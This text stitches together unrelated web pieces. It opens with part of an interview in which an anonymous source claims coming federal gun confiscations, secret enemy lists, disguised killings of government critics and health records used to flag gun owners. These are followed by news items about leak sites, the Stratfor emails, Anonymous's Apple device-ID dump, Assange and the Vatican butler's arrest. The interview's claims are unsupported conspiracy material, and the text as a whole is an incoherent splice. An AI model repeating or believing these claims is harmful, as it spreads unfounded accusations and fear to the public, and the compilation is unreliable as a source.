So the DHS, working with other law enforcement organizations, especially the TSA as it stands right now, will oversee the confiscation of assault weapons, which includes all semi-automatic weapons following a period of so-called amnesty. It also includes shotguns that hold multiple rounds, or have pistol grips. They will go after the high capacity magazines, anything over, say 5 rounds.
They will also go after the ammunition, especially at the manufacturer’s level. They will require a special license for certain weapons, and make it impossible to own anything. More draconian than England. This is a global thing too. Want to hunt? What gives you the right to hunt their animals? Sound strange? I hope so, but they believe they own the animals. Do you understand now, how sick and twisted this is? Their mentality?
The obvious intent is to disarm American citizens. They will say that we’ll still be able to defend ourselves and go hunting, but even that will be severely regulated. This is the part that they are still working out, though. While the plans were made years ago, there is some argument over the exact details. I know that Napalitano, even with her support of the agenda, would like to see this take place outside of an E.O. [Executive Order] in favor of legislative action and even with UN involvement.
DH: But UN involvement would still require legislative approval.
RB: Yes, but your still thinking normal – in normal terms. Stop thinking about a normal situation. The country is divided, which is exactly where Obama wants us to be. We are as ideologically divided as we were during the Civil War and that rift is growing every day. Add in a crisis – and economic crisis – where ATM and EBT cards will stop working. Where bank accounts will contain nothing but air. They are anticipating a revolution and a civil war rolled into one (emphasis added by this author).
Imagine when talk show hosts or Bloggers or some other malcontent gets on the air or starts writing about the injustice of it all, and about how Obama is the anti-Christ or something. They will outlaw such talk or writing as inciting the situation – they will make it illegal by saying that it is causing people to die. The Republicans will go along with everything as it’s – we have – a one party system. Two parties is an illusion. It’s all so surreal to talk about but you see where this is headed, right?
DH: Well, what about the lists?
RB: Back to that again, okay. Why do you think the NSA has surveillance of all communications? To identify and stop terrorism? Okay, to be fair, that is part of it, but not the main reason. The federal agencies have identified people who present a danger to them and their agendas. I don’t know if they are color coded like you mentioned, red blue purple or peach mango or whatever, but they exist. In fact, each agency has their own. You know, why is it so [deleted] hard for people to get their heads around the existence of lists with names of people who pose a threat to their plans? The media made a big deal about Nixon’s enemies list and everyone nodded and said yeah, that [deleted], but today? They’ve been around for years and years.
DH: I think it’s because of the nature of the lists today. What do they plan to do with their enemies?
RB: Go back to what Ayers said when, in the late 60’s? 70’s? I forget. Anyway, he was serious. But to some extent, the same thing that happened before. They – the people on some of these lists – are under surveillance, or at least some, and when necessary, some are approached and made an offer. Others, well, they can be made to undergo certain training. Let’s call it sensitivity training, except on a much different level. Others, most that are the most visible and mainstream are safe for the most part. And do you want to know why? It’s because they are in the pockets of the very people we are talking about, but they might or might not know it. Corporate sponsorship – follow the money. You know the drill. You saw it happen before, with the birth certificate.
It’s people that are just under the national radar but are effective. They have to worry. Those who have been publicly marginalized already but continue to talk or write or post, they are in trouble. It’s people who won’t sell out, who think that they can make a difference. Those are the people who have to worry.
Think about recent deaths that everybody believes were natural or suicides. Were they? People are too busy working their [butts] off to put food on the table to give a damn about some guy somewhere who vapor locks because of too many doughnuts and coffee and late nights. And it seems plausible enough to happen. This time, when everything collapses, do you think they will care if it is a bullet or a heart attack that takes out the opposition? [Deleted] no.
DH: That’s disturbing. Do you… [interrupts]
RB: Think about the Oklahoma City bombing in ’95. Remember how Clinton blamed that on talk radio, or at least in part. Take what happened then and put it in context of today. Then multiply the damnation by 100, and you will begin to understand where this is going. People like Rush and Hannity have a narrow focus of political theater. They’ll still be up and running during all of this to allow for the appearance of normal. Stay within the script, comrade.
But as far as the others, they have certain plans. And these plans are becoming more transparent. They are getting bolder. They are pushing lies, and the bigger the lie, the easier it is to sell to the people. They will even try to sell a sense of normalcy as things go absolutely crazy and break down. It will be surreal. And some will believe it, think that it’s only happening in certain places, and we can draw everything back once the dust settles. But when it does, this place will not be the same.
DH: Will there be resistance within the ranks of law enforcement? You know, will some say they won’t go along with the plan, like the Oath Keepers?
RB: Absolutely. But they will not only be outnumbered, but outgunned – literally. The whole objective is to bring in outside forces to deal with the civil unrest that will happen in America. And where does their allegiance lie? Certainly not to Sheriff Bob. Or you or me.
During all of this, and you’ve got to remember that the dollar collapse is a big part of this, our country is going to have to be redone. I’ve seen – personally – a map of North America without borders. Done this year. The number 2015 was written across the top, and I believe that was meant as a year. Along with this map – in the same area where this was – was another map showing the United States cut up into sectors. I’m not talking about what people have seen on the internet, but something entirely different. Zones. And a big star on the city of Denver.
Sound like conspiracy stuff on the Internet? Yup. But maybe they were right. It sure looks that way. It will read that way if you decide to write about this. Good luck with that. Anyway, the country seemed to be split into sectors, but not the kind shown on the internet. Different.
DH: What is the context of that?
RB: Across the bottom of this was written economic sectors. It looked like a work in progress, so I can’t tell you any more than that. From the context I think it has to do with the collapse of the dollar.
DH: Why would DHS have this? I mean, it seems almost contrived, doesn’t it?
RB: Not really, when you consider the bigger picture. But wait before we go off into that part. I need to tell you about Obamacare, you know, the new health care coming up. It plays a big part – a huge [deleted] part in the immediate reshaping of things.
DH: How so?
RB: It creates a mechanism of centralized control over people. That’s the intent of this monster of a bill, not affordable health care. And it will be used to identify gun owners. Think your health records are private? Have you been to the doctor lately? Asked about owning a gun? Why do you think they ask, do you think they care about your safety? Say yes to owning a gun and your information is shared with another agency, and ultimately, you will be identified as a security risk. The records will be matched with other agencies.
You think that they are simply relying on gun registration forms? This is part of data collection that people don’t get. Oh, and don’t even think about getting a script for some mood enhancement drug and being able to own a gun.
Ayers and Dohrn are having the times of their lives seeing things they’ve worked for all of their adult lives actually coming to pass. Oh, before I forget, look at the recent White House visitor logs.
DH: Why? Where did that come from?
RB: Unless they are redacted, you will see the influence of Ayers. Right now. The Weather Underground has been reborn. So has their agenda.
DH: Eugenics? Population control?
RB: Yup. And re-education camps. But trust me, you write about this, you’ll be called a kook. It’s up to you, it’s your reputation, not mine. And speaking about that, you do know that this crew is using the internet to ruin people, right? They are paying people to infiltrate discussion sites and forums to call people like you idiots. Show me the proof they say. Why doesn’t you source come forward? If he knows so much, why not go to Fox or the media? To them, if it’s not broadcast on CNN, it’s not real. Well, they’ve got it backwards. Very little on the news is real. The stock market, the economy, the last presidential polls, very little is real.
But this crew is really internet savvy. They’ve got a lot of people they pay to divert issues on forums, to mock people, to marginalize them. They know what they’re doing. People think they’ll take sites down – hack them. Why do that when they are more effective to infiltrate the discussion? Think about the birth certificate, I mean the eligibility problem of Obama. Perfect example.
DH: How soon do you see things taking place?
RB: They already are in motion. If you’re looking for a date I can’t tell you. Remember, the objectives are the same, but plans, well, they adapt. They exploit. Watch how this fiscal cliff thing plays out. This is the run-up to the next beg economic event. I can’t give you a date. I can tell you to watch things this spring. Start with the inauguration and go from there. Watch the metals, when they dip. It will be a good indication that things are about to happen. I got that little tidbit from my friend at [REDACTED].
NOTE: At this point, my contact asked me to reserve further disclosures until after the inauguration.
Paranoia is reputed to destroy you. But if you’re a whistleblower in search of a safe, neutral outlet, it just might save you instead.
Par:AnoIA, short for Potentially Alarming Research: Anonymous Intelligence Agency, is a website designed to collect leaks, allow project participants to work on them, and release them in a way that draws the attention of the public. The Releases section of the site, for example, currently features 1.9 gigs of information from American intel corporation Innodata.
The leaks site developed in part by necessity. WikiLeaks’ touted anonymous submission system has been offline for a year. OpenLeaks never materialized. And Cryptome is… Cryptome, meaning it neither edits nor markets its documents to the public at large.
Simply put, if WikiLeaks is a PR agency for documents and Cryptome is a leak dissemination site, Par:AnoIA aims to have the best of both. Launched in March after a year and a half of development, the site picks up where Anonleaks.ch, an earlier Anonymous leaks site, left off—literally. (Par:AnoIA currently hosts HBGary documents, which were inherited from Anonleaks.ch.) Following a July profile in Wired’s Threat Level blog, it’s suddenly the hottest disclosure site still up and running. More recently, Par:AnoIA published the private information of 3,900 members of the International Pharmaceutical Federation, and a pile of documents related to the Cambodian government, a move dubbed Operation The Pirate Bay.
The Daily Dot reached out on Twitter and, after some back-and-forth that included the stipulation that all chat and Twitter handles would be disguised, sat down for a Web chat with half a dozen key members of Par:AnoIA. We’ve given them letters of the alphabet instead of usernames.
Let’s establish the tone with this excerpt from their front-page manifesto:
Thou hath interrupted our tea moment and hath made us stand up with our backs against thine wall. But hear us; we shall fight back for it is the only choice we hath left. With our whole hearts we shall support this cause. We shan’t enjoy the fight but it is our only option to protect the ones that are not protected, the ones we love and for thine fairness. It is known to us thou doth not fear damage of the collateral kind and thou loveth to contain and restrict innocent peasants.
As Cryptome founder John Young pointed out, Par:AnoIA, being Anonymous, at least has a sense of humor, which differentiates it from the rest of the serious disclosure industry. As you can see from our introduction to the Web chat:
raincoaster has joined #paranoia
<raincoaster> Well, I’m in.
<A> lol
<A> in
<A> out
<A> left
<A> right
<A> up down left right right left down up a b a b a x y
So far, so typical. Anonymous may be trying to make the world a better place, but the hacktivist collective has always been in it for the lulz, too.
“[W]e’re not as srs,” C wrote in regards to Anonymous.
B wanted one thing clarified. “Let it be known that paranoia is not a hacker group.” They are a publishing group, meaning they won’t go out and create their own leaks.
The leak/disclosure community considers itself collegial, although no one else does. Quite the contrary, it can be competitive and even petty. There were no tears at WikiLeaks when rival site OpenLeaks failed to materialize. Cryptome founder John Young has taken pains to distance himself from WikiLeaks, on whose board he originally served. And, of course, whistleblowers and hackers alike are paranoid all the time, for obvious reasons.
For example, on July 12, a WikiLeaks supporter called Par:AnoIA out on Twitter for their choice of top-level domain registrar, Neustar, which Buzzfeed has called “the Keyzer Söze of surveillance,” the law enforcement’s data surveillance provider of choice. @Par:AnoIA, who at that point had fewer than 2,000 followers, said the whole thing was just another pointless flame war that distracted from the issue at hand.
One member explained, “To be honest, we are indifferent to WikiLeaks. They just should not start trying to tell people we host honeypots for feds.” In other words, WikiLeaks accused Par:AnoIA of being a front for the FBI, a sensitive subject given the arrest of former hacker turned informant Hector “Sabu” Monsegur.
“We don’t strive to be unique; why should we?” C asked.
“We just do what we think is good and right, and i think we can do it with minimal efforts, at least in a financial sense. we are not here for competition. We don’t strive to be the best. We just want to offer the best we can.”
Unlike most Anonymous projects, Par:AnoIA does ask for donations in the form of Bitcoins, an international online currency that’s difficult to trace and favored by hackers. They told us publicly that the money goes for server costs. John Young of Cryptome estimates his own server costs at around $100 per month, and he has relatively high traffic, so it’s logical to estimate their costs at less than half that.
They volunteer their time, and they volunteer a lot of it: They read each and every document that comes in. They do not edit the documents in any way, although they will not guarantee publication of every document. Archivists are philosophically split on whether their duty is owed to the documents or to the users, and Par:AnoIA clearly comes down on the side of the documents, as does Cryptome. Its redaction policy means WikiLeaks is on the other side of this prickly, barbed-wire fence.
What does that mean day-to-day? Would they refuse to release a document because it could change the world in a way they didn’t like? According to the Web chat consensus, the only leak they’d withhold would be nuclear launch codes. C explained that, “Public information is better than information in secret hands. We make spies obsolete.”
They’re not relying on the general public for the leaks but rather on people within their existing networks. B said they would never run out of sources. “You always make new connections.” C added, “Our connections extend daily.”
You don’t need an engraved invitation, though, or even a Guy Fawkes mask; the site can accept submissions from anyone. The Anons dismissed the idea of accepting links via email only, for security, context, and philosophical reasons. The point is not simply to take information in, but to take it in in the original form and to also post it in a form the public can access without going through some interstitial person or process.
“You need to have a nice working site where people can just click and read and even see a summary, see evidence that this whole shit is corrupted like fuck,” C said. “Research is another vector. We do that already on a limited basis.”
The first project Par:AnoIA tackled was the Arrest Tracker, correlating all the arrests of Anons worldwide by Anon name. You’d think this would be for PR or media purposes. You’d be wrong. The Arrest Tracker is an old-school wiki (fans of Wikipedia will recognize the aesthetics) that’s thoroughly annotated, with links to newspaper reports of court appearances and schedules. C explained: “We actually started that for ourselves so we can check wtf was going on. Real names are only mentioned if disclosed in media, of course. Everything has a source. It’s no foo, it’s facts. I hate foo.”
The members of Par:AnoIA claimed to not have plans to monetize their content, nor did they desire to market their materials like WikiLeaks does, making media partnerships and controlling the flow of information.
“We do shit when we have time, interest .. and .. meh,” C replied. “All media are the same, 14 reader blog or Fox News. I hate the idea of elitism. Eure, some initial attention is nice.. but in the end…it’s our releases that will speak.”
“I’d like see Bush & Co at the Hague…and…. something that would set Manning free,” B added, referring to alleged WikiLeaks cooperative Bradley Manning.
Knocking out private security and intel corporations like HBGary also remains a priority for the future.
C put it best, in typical chat humor: “I would like to have that document that really buttfucks the whole establishment in a bad way.
“I know it’s out there, on some server, somewhere, hand us enough leaks and we will find it!”
Despite facing often draconian measures, whistleblowers are increasingly winning public support, reveals a new survey
The Obama administration has gone in hard against alleged whistleblowers, such as Bradley Manning. Photograph: Brendan Smialowski/AFP/Getty Images
Whistleblowing is relevant in the UK now more than ever, as the recent stream of high profile cover-ups and the relentless clamp downs on truth tellers has shown. The Hillsborough Inquiry, the string of serious problems in the NHS and related health agencies, the recently revealed Ministry of Defence internal document gagging whistleblowers from revealing wrongdoing to their own MPs. The list of examples goes on and on. They illustrate exactly why we need whistleblowers in society in the first place.
Whistleblowing is when members of an organisation reveal inside information about serious wrongdoing to someone they believe can act on it. Whistleblowers don’t have to be employees; they can be members of a school or church community organisation, for example. A good example of this is the whistleblowers who stepped forward to confirm incidents of paedophilia in Catholic institutions over the past decade.
The word whistleblower used to evoke images of shady characters whispering secrets in dark car parks. Now it’s increasingly seen as central to a healthy democracy. This trend in public attitude is happening simultaneously around the globe. A 2012 random sample Newspoll survey in Australia of 1,211 people showed that 81% believed whistleblowers should be protected and not punished, even if they reveal inside information.
The advent of online leaks news sites like WikiLeaks have likely played a role in this. There are more than 15 leaks-related sites with another, Ljost (or ‘light’ in Icelandic) officially launched by the The Associate Whistleblowing Press on 30 September.
Technology such as anonymising software like Tor, free file encryption programs such as GPG, and access to journalists via Twitter have all converged to make fertile ground for 21st century whistleblowing. It’s faster, easier and doesn’t involve any dark car parks.
This may be why western governments are running crackdowns against whistleblowers with a vehemence rarely seen in recent history. The Obama administration has gone in hard against alleged whistleblowers and in some cases journalists. The target list includes former US NSA senior executive Thomas Drake, army private Bradley Manning and reporter James Risen.
Governments are now also frequently turning technology inward to spy on employees and others in an effort to thwart whistleblowing to the media. So while whistleblowing has become easier, spying technology has also made it riskier to do online.
However, it appears the public is becoming impatient with governments that spend all their time on whistleblower witch hunts instead of punishing the underlying wrongdoing. There also seems to be a growing sense of unfairness with the David and Goliath battles, where the little guy trying to do the right thing is so outgunned from the start.
Whistleblowing tends to go hand in hand with coverups. The independent panel investigating the Hillsborough tragedy in which 96 football fans died found that police had not only lied about what happened, they had deliberately altered evidence of those who tried to tell the truth. Public outrage at the cover up was so great prime minister David Cameron had to apologise to the victims’ families.
Like Hillsborough, the Mid Staffordshire NHS Inquiry highlights growing public concern over wrongdoing and coverups. In following up reports of unusually high hospital mortality rates, an independent inquiry criticised the Stafford Hospital’s handling of patients. The few whistleblowers who dared to stand up were ignored or suffered retaliation. Another apology from the PM had to be made, again to the victims and families.
Britain now waits for the results of a new, wider public inquiry chaired by Robert Francis QC. The final report, including review of the million-plus pages of evidence, was due to be released this month. However Francis recently announced that the report would not now be delivered until early 2013. There is skepticism among health workers as to whether this inquiry – the fifth – will truly be fearless in seeking to fix the sick system.
The NHS and related health agencies’ woes have continued to mount with two high-profile whistleblowing cases pointing to more allegations of wrongdoing. In the first, radiology service manager Sharmila Chowdhury revealed allegations that doctors were being paid to see NHS patients while they were actually moonlighting with their own private patients. Ealing Hospital NHS Trust sacked Ms Chowdhury but a Watford employment tribunal judge ordered that she be reinstated. She has subsequently been made redundant – after facing legal fees of more than £100,000 to defend herself.
In a second case, a non-executive director of the regulator the Care Quality Commission (CQC), Kay Sheldon, faced accusations of being ‘mentally ill’ and attempts to sack her after she blew the whistle at a public inquiry into CQC. This is a classic response to whistleblowers: they are either ‘bad’ or ‘mad’ and thus their criticisms must not be valid.
While whistleblowers play an important role in revealing wrongdoing to the public, there is surprisingly little academic research on whistleblowing to the media, and even less on the role of technology in it. I am the principal researcher on an international study team that hopes to shed light on how technology is impacting on whistleblowing, particularly to the news organisations. In addition to interviewing whistleblowers and the investigative journalists who interact with them, we are also running a detailed online survey.
The World Online Whistleblowing Survey (WOWs) is the first online survey aimed at gauging the general public’s attitudes to whistleblowing that is being run in so many languages. The anonymous survey is available in 11 languages and is open to everyone to participate, not just whistleblowers.
The study team includes researchers from Griffith University and the University of Melbourne in Australia, and Georgetown University in the US. Early data from the online survey points strongly to a public belief among both Australian and British respondents that there is too much secrecy in organisations (a breathtaking 90% in both cases).
However, British respondents were more cynical than Australians about the usefulness of official channels for reporting wrongdoing in organisations.
About 38% of Australians believed that going to authorities via official channels was the best way to stop serious wrongdoing while only 15% of respondents from the UK agreed. Instead 43% of UK respondents thought going to the media was the most effective way, compared to 27% of Australians.
The increasing importance of whistleblowing in the health area is evidenced by a recent conference on the topic run jointly between the British Medical Association and the Patients First group. Whistleblower pediatrician Dr Kim Holt, a speaker at the event, co-founded Patients First in response to the persistent mistreatment of whistleblowers in health. She said UK legislation did not properly defend whistleblowers, and it needed to be amended to address problems such as whistleblowers facing employer ‘gag’ clauses on revealing wrongdoing and huge legal defence costs.
It’s clear whistleblowing is an important part of a participatory democracy, yet many still remain confused about what value governments and legal scholars place on it. Time will tell what influence cases such as Wikileaks and the NHS will have on this value, but one thing seems likely – despite facing often draconian measures, whistleblowers are increasingly winning public support.
The New York City Police Department (NYPD) really has gone rogue; at least that’s what a high-level FBI official believes.
Among the 5 million emails the group Anonymous hacked from the servers of private intelligence firm Stratfor in February, one seems to not only confirm the controversial NYPD surveillance activities uncovered by the Associated Press, but hints at even worse civil liberties violations not yet disclosed. Anonymous later turned the emails over to WikiLeaks, with which Truthout has entered into an investigative partnership.
I keep telling you, you and I are going to laugh and raise a beer one day, when everything Intel (NYPD’s Intelligence Division) has been involved in during the last 10 years comes out – it always eventually comes out. They are going to make [former FBI Director J. Edgar] Hoover, COINTEL, Red Squads, etc look like rank amatures [sic] compared to some of the damn right felonious activity, and violations of US citizen’s rights they have been engaged in.
The description of alleged NYPD excesses was leveled by an unnamed FBI “senior official” in late November 2011, in an email sent to Fred Burton, vice president for intelligence at the Austin, Texas-based Stratfor and former deputy chief of the counterterrorism division at the State Department. Burton then sent the official’s email to what appears to be a listserv known as the “Alpha List.”
Burton did not identify the senior FBI official in the email he sent to the listserv. He describes him as a “close personal friend,” and claims he “taught him everything that he knows.” He also instructs members of the listserv not to publish the contents of the email and to use it only for background.
Stratfor, in a statement released after some of the emails were made public, said some of the emails “may be forged or altered to include inaccuracies; some may be authentic” but “having had our property stolen, we will not be victimized twice by submitting to questioning about them.”
What’s particularly stunning about the FBI senior official’s description of NYPD Intelligence Division activities, is how he connects them to previous instances when his own agency bent and broke the law in pursuit of intelligence on perceived enemies of the state throughout the 20th century – and concludes the NYPD Intelligence Division’s violations are worse. As Pulitzer Prize-winning author and former New York Times reporter Tim Weiner writes in his new book, “Enemies: A History of the FBI,” the Bureau has been “America’s closest counterpart” to a secret police.
In the email, Burton queried the FBI official to gain a better understanding of why the FBI declined to get involved with a case involving an alleged “lone wolf” terrorist and al-Qaeda sympathizer named Jose Pimentel, a 27-year-old American of Dominican descent, accused of trying to build three pipe bombs to detonate in New York City.
The FBI official responded by describing some turf and relationship issues between NYPD intelligence officials and NYPD and FBI investigators on New York City’s Joint Terrorism Task Force. It appears the FBI senior official was responding to a news story about Pimentel’s arrest published by the far-right leaning Newsmax, headlined “FBI- NYPD Tensions Highlighted in Terror Case,” which was attached to an email Stratfor analysts had sent around the office.
There are two issues with this case (off the record of course).
One is the source (confidential informant) was a nightmare and was completely driving the investigation. The only money, planning, materials etc the bad guy got was from … the source. The source was such a maron [sic], he smoked dope with the bad guy while wearing an NYPD body recorder – I heard in open source [sic] yesterday btw [by the way], he is going to be charged with drug possession based on the tape. Ought to go over very nicely when he testifies against the bad guy, don’t you think?
Issue two is that the real rub is between NYPD Intel, [Intelligence Division] and NYPD – JTTF [Joint Terrorism Task Force], not the FBI per se. The NYPD JTTF guys are in total sync with the Bureau and the rest of the partners who make up the JTTF – I understand there are something like 100 NYPD dics [detectives] assigned to the JTTF. NYPD Intel (Cohen, et al) on the other hand, are completely running their own pass patterns. They hate their brother NYPD dics on the JTTF and are trying to undermine them at every turn. They are also listening to [former CIA official David] Cohen [the head of NYPD’s Intelligence Division] who, near as anybody can tell, never had to make a criminal case or testify in court.
Joint Terrorism Task Forces are FBI-led counterterrorism investigative units that combine federal, state and local law enforcement in an effort to detect and investigate terrorist activity and prevent attacks before they occur. Originally created in the 1980s, the creation of JTTFs nationwide was accelerated after 9-11. Currently, 104 JTTFs operate nationwide and are considered one of the most important assets in the federal government’s muscular counterterrorism architecture.
After reviewing the Stratfor email thread for Truthout, Michael German, senior policy counsel at the American Civil Liberties Union’s Washington Legislative Office and a former FBI agent who infiltrated white supremacist terrorist organizations, described the FBI official’s criticism of the NYPD’s intelligence as “doubly ironic.”
“The FBI has engaged in widespread spying on the Muslim American community as well, including counting mosques and mapping Muslim neighborhoods, infiltrating mosques with informants, and using the guise of community outreach to spy on Muslim religious and advocacy organizations,” German told Truthout. “But more critically, because the FBI is charged with enforcing the civil rights laws in this country, including violations under color of law.
“This agent suggests the FBI knew the NYPD Intelligence agents were involved in widespread ‘felonious’ activity in violation of Americans’ civil rights, yet the FBI does not appear to have opened a civil rights investigation or done anything to stop this illegal activity. Our laws are designed to apply equally to protect all of us, including to protect us from illegal police activity. When the FBI abdicates this responsibility, all Americans suffer.”
Responding to the background information from the FBI senior official, Sean Noonan, a “tactical analyst” with Stratfor, wrote in an email sent to the “Alpha List,” “The point that the divide is within NYPD is contradictory to how they would like present it. [sic]. The way the pro-NYPD stories cover it is that NYPD CT/Intel [counterterrorism/intelligence] has successfully gained influence within the JTTF, almost to the point of having infiltrated it.”
German, however, tells Truthout that the rift between the NYPD’s intelligence analysts and NYPD investigators assigned to the FBI’s JTTF, as revealed by the senior FBI official’s email, is consistent with his experience.
“Criminal investigators, like those assigned to the JTTFs, typically find information produced by these intelligence analysts to be useless, whether they’re NYPD intelligence or FBI intelligence,” he said.
And no matter how bad the mutual acrimony between NYPD intelligence analysts and New York City’s JTTF has gotten, German isn’t surprised that the FBI has declined to investigate allegations of the NYPD Intelligence Division breaking the law.
“The FBI didn’t open investigations when it discovered other government agencies engaging in torture and illegal wiretapping either,” he said.
But eventually, the senior FBI official predicts in his email to Burton, the extent of NYPD’s alleged crimes will be revealed.
“As Rush Limbaugh likes to say, ‘don’t doubt me on this,'” he wrote at the end of his correspondence.
Matthew Harwood is a journalist in Washington, DC, and a frequent contributor to the Guardian’s Comment is Free. His writing has appeared in The Washington Monthly, Progress Magazine (U.K.) as well as online at Columbia Journalism Review, CommonDreams, and Alternet. He is currently working on a book about evangelical Christian rhetoric and aggressive US foreign policy. You can follow Matt on Twitter @mharwood31.
Jason Leopold is lead investigative reporter of Truthout. He is the author of the Los Angeles Times bestseller, News Junkie, a memoir. Visit jasonleopold.com for a preview. His most recent investigative report, “From Hopeful Immigrant to FBI Informant: The Inside Story of the Other Abu Zubaidah,” is now available as an ebook. Follow Jason on Twitter: @JasonLeopold.
Anonymous has a way of releasing massive collections of information that raise many more questions than they answer.
Case in point: On Monday night, the segment of the hacker group that calls itself Antisec announced that it had dumped 1,000,001 unique device identifier numbers or UDIDs for Apple devices–the fingerprints that Apple, apps and ad networks use to identify the iPhone and iPads of individual users–that it claims to have stolen from the FBI. In a long statement posted with links to the data on the upload site Pastebin, the hackers said they had taken the Apple data from a much larger database of more than 12 million users’ personal information stored on an FBI computer.
While there’s no easy way to confirm the authenticity or the source of the released data, I downloaded the encrypted file and decrypted it, and it does seem to be an enormous list of 40-character strings made up of numbers and the letters A through F, just like Apple UDIDs. Each string is accompanied by a longer collection of characters that Anonymous says is an Apple Push Notification token and what appears to be a username and an indication as to whether the UDID is attached to an iPad, iPhone or iPod touch.
In their message, posted initially in the Anonymous twitter feed AnonymousIRC, the hackers say they used a vulnerability in Java to access the data on an FBI Dell laptop in March of this year. They say the database included not only the UDIDs, but also “user names, name of device, type of device, Apple Push Notification Service tokens, zipcodes, cellphone numbers, addresses, etc.” Anonymous claims that the amount of data about each users was highly variable, and that it only released enough data to the public “to help a significant amount of users to look if their device are listed there or not.”
The Antisec statement also took the opportunity to mock the recent appearance of NSA Director and General Keith Alexander at the hacker conference Defcon, where he made a recruiting pitch to attendees. “It was an amusing hypocritical attempt made by the system to flatter hackers into becoming tools for the state,” Anonymous’ statement reads. “We decided we’d help out Internet security by auditing FBI first.”
If the UDIDs are determined to be real, just what that means about law enforcement and Apple users’ privacy isn’t entirely clear. Much more than passwords or even email addresses, UDIDs are already spread around the Internet by app developers and advertisers–a study by one privacy researcher in 2011 found that 74% of the apps he tested sent a user’s UDID to a remote server. But the same researcher also found that five out of seven social gaming networks he tested allowed users to log in with only their UDID, making a stolen UDID equivalent to a stolen password.
“We never liked the concept of UDIDs since the beginning indeed,” reads the Anonymous statement. “Really bad decision from Apple. Fishy thingie.”
Regardless, if the FBI has in fact collected 12 million Apple UDIDs–or even just one million–it will have some explaining to do to privacy advocates. In its release, Anonymous argues that the massive dump of users’ personal information, which it says has been stripped of many of the most identifying details, is designed raise awareness of the FBI’s alleged gadget-tracking shenanigans. “…We will probably see their damage control teams going hard lobbying media with bullshits to discredit this,” the statement reads at one point. “But well, whatever, at least we tried and eventually, looking at the massive number of devices concerned, someone should care about it.”
For now, Anonymous refuses to answer more questions about its release–at least from the press. Before granting any interviews, it’s demanding that Gawker writer Adrian Chen, who has been especially critical of Anonymous, appears on Gawker’s home page in a “huge picture of him dressing a ballet tutu and shoe on the head.”
UPDATE [3:30pm PST] – “Assange asylum rumor is false,” Correa confirmed on his Twitter feed. He added that he is waiting for a Foreign Ministry report on the issue, without which a decision will not be made.
Ecuador has reportedly granted asylum to WikiLeaks founder Julian Assange, who requested it after the British Supreme Court refused to reopen his appeal against extradition to Sweden where he is wanted for questioning over alleged sex crimes.
WikiLeaks founder has been holed up in the country’s London embassy since June 19.
The asylum guarantees him safe passage from the UK to Ecuador, says Professor Donald Rothwell from the Australian National University College of Law.
In Sweden the whistleblower is wanted for questioning over accusations of sex crimes, but Assange and most of his supporters fear that once he arrived in Sweden, he would be handed over to US authorities.
Assange and his lawyers believe that the US has already lodged a sealed indictment against Assange, and that his case might outdo the one of Bradley Manning.
The whistleblower website founded by Julian Assange has leaked hundreds of thousands of classified diplomatic cables, including top secret documents from the US Department of Defense, and secret cables from the State Department.
Rome (CNN) — Pope Benedict’s butler has been arrested on suspicion of leaking confidential documents to an Italian journalist, the Vatican said Saturday.
Paolo Gabriele, 46, was arrested Wednesday for illegal possession of confidential documents, found in his apartment in Vatican territory, the Vatican said in a statement issued three days later.
Gabriele, who has worked as the papal butler since 2006, is one of only a handful of people with access to the pontiff’s private desk.
His job included handing out rosaries to dignitaries and riding in the front seat of the “Popemobile,” a vehicle used for public papal appearances, as seen in many photographs showing Gabriele with the pope.
Last month, the Vatican gave Cardinal Julian Herranz a “pontifical mandate” to uncover the source of hundreds of personal letters and confidential documents that have been released to Gianluigi Nuzzi, an Italian journalist and author of “Sua Santita,” a book that translates to “His Holiness” and includes the documents.
Nuzzi would not confirm the identity of his sources, but he told CNN that his primary source — who he referred to as “Maria” in his book — “risked life and limb” if ever found out.
The source worked inside the Vatican, according to Nuzzi, who refused to give other details such as the source’s gender, age and if he or she was clergy or not.
Nuzzi told CNN that he has not been questioned in connection with the arrest. The Vatican called the publication of his book “criminal” when it was released last Saturday in Italian.
Feltrenelli and Mondadori booksellers both rank the book No. 1 in sales within Italy.
Nuzzi’s book highlights an internal power struggle within the Vatican through numerous documents including faxes, personal letters and inter-Vatican memos. He told CNN that he received the documents during a year of private meetings in secret locations.
The documents show that the allegations of corruption and money laundering were a concern for a number of high ranking prelates, including Carlo Maria Vigano, who is now the Papal Nuncio in Washington, DC.
Vigano wrote in a series of letters to the pope that he was concerned about the spread of corruption and that his move to Washington would stir speculation.
“Holy Father, my transfer at this time would provoke much disorientation and discouragement in those who have believed it was possible to clean up so many situations of corruption and abuse of power that have been rooted in the management of so many departments,” according to his letter which was published in the book.
The Vatican has not denied the authenticity of the documents, but instead says the breach of privacy is a criminal act.
The 108-acre city-state has its own judicial system, distinct from the Italian judicial system. CNN senior Vatican analyst John Allen pointed out that its courts normally prosecute the likes of pickpockets, “not alleged moles.”
Thus, the Vatican doesn’t have facilities to incarcerate anyone on a long-term basis and the civil and criminal penalties it typically metes out are limited, Allen said Saturday. He speculated that, for these and other reasons, the Vatican may ask — assuming that it determines there is enough evidence against Gabriele — that any such trial occur within the Italian judicial system.
“The question then would become: Does the Italian government want to pick that (trial) up?” said Allen, a senior correspondent for the National Catholic Reporter. “In addition to being an embarrassing scandal for the Vatican on its own terms, this also has the potential to become … a diplomatic contretemps.”
For now, Gabriele is being held in a special cell within the Vatican City, a walled enclave within Rome, according to Vatican spokesman Federico Lombardi.
Lombardi said the pope was “saddened and shocked” at the arrest.
The Vatican said the first phase of its preliminary investigation, under chief prosecutor Nicola Picardi, had now ended. An investigating judge, Piero Antonio Bonnet, is leading the next stage of the investigation, which could lead to a trial or acquittal.
Gabriele has appointed two lawyers of his choice to act at the Vatican Tribunal, and has had a chance to meet them, the Vatican statement said.
“He enjoys all the legal guarantees provided by the criminal code and criminal procedure in force in the State of Vatican City,” it added.
Leak Sites that publish leaks and accept submission of leaks, inspired by the original WikiLeaks.org concept.
WikiLeaks – WikiLeaks website – love them or hate them – no new submissions for 2 years – new submission system still not launched as promised on 28/11/2011 or 01/12/2011
BritiLeaks false start – BritiLeaks website – original false start: launched with less than no anonymity or security protection at all – see below for current site .
BritiLeaks – BritiLeaks website – new secure website launch promised soon, already has strong TLS Digital Certificate and Tor Hidden Services – still to be launched “in a few days”, but hosting mirrors of other whistleblowing websites.
MurdochLeaks – The Murdoch Leaks Project website – “will accept tips or evidence of wrong doing relating to Rupert Murdoch’s affiliated institutions such as News International and News Corporation”
OpenWatch – OpenWatch.net encourages the public to use their mobile phone software to record encounters with the police and authority, then submit them for posting online.
LectureLeaks – LectureLeaks – Use recording mobile software to record and leak university lectures. Has content already, open source.
